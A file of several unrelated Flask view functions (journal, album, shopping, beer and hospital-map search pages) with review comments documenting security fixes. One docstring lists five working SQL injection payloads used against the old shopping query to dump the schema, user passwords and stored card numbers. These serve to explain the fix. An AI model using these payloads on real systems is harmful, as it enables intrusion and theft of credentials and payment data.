def search():
    """Render the journal search page.

    Binds ``SearchForm`` to the posted data and loads every ``Journal``
    row for the template. On a validated POST the ``keyword`` field is
    read but not yet applied to the query, so the complete journal list
    is rendered either way.

    Returns:
        The rendered ``search/search.html`` template.
    """
    form = SearchForm(request.form)
    journals = Journal.query.all()

    is_valid_post = request.method == 'POST' and form.validate()
    if is_valid_post:
        # Validated search term; filtering on it is still to be done.
        keyword = form.keyword.data

    return render_template('search/search.html', journals=journals, form=form)
def search():
    """Render the album/artist search page.

    Binds ``SearchForm`` to the posted data and loads every ``Album`` and
    ``Artist`` row for the template. On a validated POST the ``keyword``
    field is read but not yet applied, so the full lists are rendered
    regardless of the search term.

    Returns:
        The rendered ``search/search.html`` template.
    """
    form = SearchForm(request.form)
    artists = Artist.query.all()
    albums = Album.query.all()

    is_valid_post = request.method == 'POST' and form.validate()
    if is_valid_post:
        # Validated search term; filtering on it is still to be done.
        keyword = form.keyword.data

    return render_template('search/search.html', albums=albums, artists=artists, form=form)
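def Search(product):
    """Render the product search page for the ``product`` name in the URL.

    Looks up ``products`` rows whose ``name`` equals ``product`` exactly
    (no wildcard matching) using a parameterized query, and on POST
    redirects back to this view with the submitted search term in the URL.

    Args:
        product: the search term taken from the route. Treated as
            untrusted input: it is only ever bound as a query parameter.

    Returns:
        The rendered ``shopping/Search.html`` response, or a redirect to
        ``shopping.Search`` when the search form was posted.

    Security note: the previous implementation interpolated ``product``
    into the SQL text with ``str.format`` and was injectable. Against the
    old query, entering these as the product name dumped the schema,
    every user's credentials and stored card data (the recorded trail
    also shows SQLite error text reaching the tester, so database errors
    should be hidden by an error handler outside this view):

        ' UNION SELECT '1', '2', '3', '4', '5', '6', '7', '8' FROM sqlite_master--   (column count probe)
        ' UNION SELECT '1', sql, '3', '4', '5', '6', '7', '8' FROM sqlite_master--   (schema)
        ' UNION SELECT '1', username, '3', '4', password, '6', '7', '8' FROM users--
        ' UNION SELECT '1', ccnumber, '3', '4', cvv, '6', '7', '8' FROM paymentdetails--
        ' UNION SELECT rowid, name, image, '4', cost_price, '6', '7', '8' FROM products--   (hidden products)

    Binding ``product`` as a ``?`` parameter makes the quote a literal
    character of the search term, so none of these reach the parser as SQL.
    The debug ``print`` of the result rows was removed as well.
    """
    if 'username' in session:
        # NOTE(review): the password and security answer are kept in the
        # session; if this is the default client-side cookie session they
        # are readable by the browser. Prefer storing only an identifier.
        user = User(session['username'], session['email'], session['password'],
                    session['question'], session['answer'])
    else:
        user = None

    conn = sqlite3.connect(os.path.join(file_directory, "storage.db"))
    try:
        c = conn.cursor()
        # Parameterized: the driver binds `product` as data, never as SQL.
        c.execute("SELECT rowid, * FROM products WHERE name = ?", (product,))
        results = c.fetchall()
    finally:
        # Close on every path, including a failed query.
        conn.close()

    form = SearchForm(request.form)
    if request.method == "POST":
        # The endpoint is fixed, so this is not an open redirect; the term
        # simply becomes the `product` route argument of this same view.
        return redirect(url_for('shopping.Search', product=form.Search.data))

    return render_template("shopping/Search.html",
                           user=user,
                           products=results,
                           search=product,
                           form=form)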
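def Products():
    """Render the product catalogue with a search box.

    Builds a ``User`` from the session when someone is logged in, reads
    every ``products`` row (with ``rowid``) from ``storage.db`` and on
    POST redirects to ``shopping.Search`` with the submitted search term.

    Returns:
        A redirect to ``shopping.Search`` after a POST, otherwise the
        rendered ``shopping/Products.html``.
    """
    if 'username' in session:
        # NOTE(review): the password and security answer are kept in the
        # session; if this is the default client-side cookie session they
        # are readable by the browser. Prefer storing only an identifier.
        user = User(session['username'], session['email'], session['password'],
                    session['question'], session['answer'])
    else:
        user = None

    conn = sqlite3.connect(os.path.join(file_directory, "storage.db"))
    try:
        # Static SQL: no request data enters the statement text.
        c = conn.cursor()
        c.execute("SELECT rowid, * FROM products")
        products = c.fetchall()
    finally:
        # Previously the connection leaked when the query raised.
        conn.close()

    search = SearchForm(request.form)
    if request.method == "POST":
        # The term travels in the URL to the Search view, which must bind
        # it as a query parameter rather than interpolate it into SQL.
        return redirect(url_for('shopping.Search', product=search.Search.data))

    return render_template("shopping/Products.html", user=user, form=search, products=products)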
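def Products():
    """Render the product catalogue with a search box.

    Uses ``current_user`` when it exposes a username, reads every
    ``products`` row from ``storage.db`` and on POST redirects to
    ``shopping.Search`` with the submitted search term.

    Returns:
        A redirect to ``shopping.Search`` after a POST, otherwise the
        rendered ``shopping/Products.html``.
    """
    try:
        current_user.get_username()
        user = current_user
    except Exception:
        # Presumably an anonymous visitor with no username to read. The
        # former bare `except:` also swallowed SystemExit/KeyboardInterrupt.
        user = None

    conn = sqlite3.connect(os.path.join(file_directory, "storage.db"))
    try:
        # Static SQL: no request data enters the statement text.
        c = conn.cursor()
        c.execute("SELECT * FROM products")
        products = c.fetchall()
    finally:
        # Previously the connection leaked when the query raised.
        conn.close()

    search = SearchForm(request.form)
    if request.method == "POST":
        # The term travels in the URL to the Search view, which must bind
        # it as a query parameter rather than interpolate it into SQL.
        return redirect(url_for('shopping.Search', product=search.Search.data))

    return render_template("shopping/Products.html",
                           user=user,
                           form=search,
                           products=products)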
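def home():
	"""Render the home page: a search form plus five random beers.

	On POST the submitted search type and text are stored in the session
	and the client is redirected to ``searchResults``. Otherwise five
	random beer ids are looked up (active beers only) for display.

	Returns:
		A redirect to ``searchResults`` after a POST, otherwise the
		rendered ``home.html`` with ``form`` and ``randBeersTable``.
	"""
	form = SearchForm(request.form)

	if request.method == 'POST':
		# Hand the search over to the results view via the session.
		session['searchType'] = form.searchType.data
		session['searchText'] = form.searchText.data
		return redirect(url_for('searchResults'))

	# Five *distinct* ids in 0..253 (same range as before). The old
	# round(random()*253) could repeat an id, and a repeated id in the
	# IN list silently yields fewer than five rows.
	rand_ids = random.sample(range(0, 254), 5)

	# %-formatting is acceptable here only because the ids are ints
	# generated above. Never reuse this pattern with request data; bind
	# parameters instead.
	query = """SELECT beers.beer_id, beers.name, beers.abv, beer_types.name, brewers.name FROM beers INNER JOIN brewers ON beers.brewer_id = brewers.brewer_id INNER JOIN beer_types ON beers.type_id = beer_types.type_id WHERE beer_id IN (%s,%s,%s,%s,%s) AND beers.inactive = 0;""" % tuple(rand_ids)

	results = db_connect.execute_query(query)

	# Row layout follows the SELECT above: id, name, abv, style, brewer.
	payload = []
	for result in results:
		# abv is scaled by 100 for display, so the column presumably
		# holds a fraction -- verify against the schema.
		abv_str = str(result[2] * 100) + '%'
		payload.append({
			'beer_id': result[0],
			'name': result[1],
			'abv': abv_str,
			'style': result[3],
			'brewer': result[4],
			'route': 'home',
			'order': '+',
		})

	randBeersTable = RandomTable(payload)

	return render_template('home.html', title='Home', form=form, randBeersTable=randBeersTable)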
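def Search(product):
    """Render the product search page for the ``product`` name in the URL.

    Looks up ``products`` rows whose ``name`` equals ``product`` exactly
    (no wildcard matching) with a parameterized query, and on POST
    redirects back to this view with the submitted search term.

    Args:
        product: the search term taken from the route. Untrusted; it is
            only ever bound as a query parameter.

    Returns:
        The rendered ``shopping/Search.html`` response, or a redirect to
        ``shopping.Search`` when the search form was posted.
    """
    try:
        current_user.get_username()
        user = current_user
    except Exception:
        # Presumably an anonymous visitor with no username to read. The
        # former bare `except:` also swallowed SystemExit/KeyboardInterrupt.
        user = None

    conn = sqlite3.connect(os.path.join(file_directory, "storage.db"))
    try:
        c = conn.cursor()
        # Parameterized: `product` is bound as data, never spliced into SQL.
        c.execute("SELECT rowid, * FROM products WHERE name=? ", (product, ))
        results = c.fetchall()
    finally:
        # Close on every path, including a failed query.
        conn.close()

    form = SearchForm(request.form)
    if request.method == "POST":
        # Fixed endpoint, so not an open redirect; the term becomes the
        # `product` route argument of this same view.
        return redirect(url_for('shopping.Search', product=form.Search.data))

    return render_template("shopping/Search.html",
                           user=user,
                           products=results,
                           search=product,
                           form=form)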
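def search():
    """Render the device search page, with a map after a valid search.

    On a validated POST the filter fields are read (they are not applied
    to any query yet), the first ``Hospitals`` row stands in for a device
    location, and a Google Map centred on a hard-coded user position is
    built with one marker per device plus a circle around the user.
    Without a valid POST, or when no hospital row exists, only the form
    is rendered.

    Returns:
        The rendered ``search.html`` template; ``map`` and ``hospital``
        are passed only when a map could be built.
    """
    form = SearchForm(request.form)
    if not (request.method == 'POST' and form.validate()):
        return render_template('search.html', form=form)

    from flask_googlemaps import Map

    # Validated filter inputs. Read here so a missing field still fails
    # loudly, but not yet used to narrow the results.
    filters = {
        'kensa': form.kensa.data,
        'chiryo': form.chiryo.data,
        'shikkan': form.shikkan.data,
        'area': form.area.data,
        'from_time': form.from_time.data,
        'to_time': form.to_time.data,
    }

    hospital = Hospitals.query.first()
    if hospital is None:
        # Previously an AttributeError (HTTP 500) on hospital.latitude.
        return render_template('search.html', form=form)

    # Placeholder for the request JSON the real feature will take, e.g.
    # {'user': {'x': ..., 'y': ...}, 'devices': [{'id', 'x', 'y', 'data'}, ...]}
    json_data = {
        'user': {
            'x': 35.94149,
            'y': 139.771598
        },
        'devices': [{
            'id': '0001',
            'x': hospital.latitude,
            'y': hospital.longitude,
            'data': 'something'
        }]
    }

    user_location = (json_data['user']['x'], json_data['user']['y'])

    # One marker per device (the old code only ever read device '0001').
    # NOTE(review): 'infobox' is presumably inserted into the page's map
    # markup; once device 'data' comes from a request it must be escaped.
    markers = [{
        'lat': device['x'],
        'lng': device['y'],
        'infobox': device['data'],
    } for device in json_data['devices']]

    # Circle drawn around the user's position; radius is in metres.
    circle = {
        'stroke_color': '#0000FF',
        'stroke_opacity': .5,
        'stroke_weight': 5,
        'fill_color': '#FFFFFF',
        'fill_opacity': .2,
        'center': {
            'lat': user_location[0],
            'lng': user_location[1]
        },
        'radius': 100
    }

    # Local renamed from `map` to avoid shadowing the builtin.
    gmap = Map(
        identifier="map",
        varname="map",
        lat=user_location[0],
        lng=user_location[1],
        zoom=12,
        markers=markers,
        circles=[circle]
    )

    return render_template('search.html',
                           map=gmap,
                           form=form,
                           hospital=hospital)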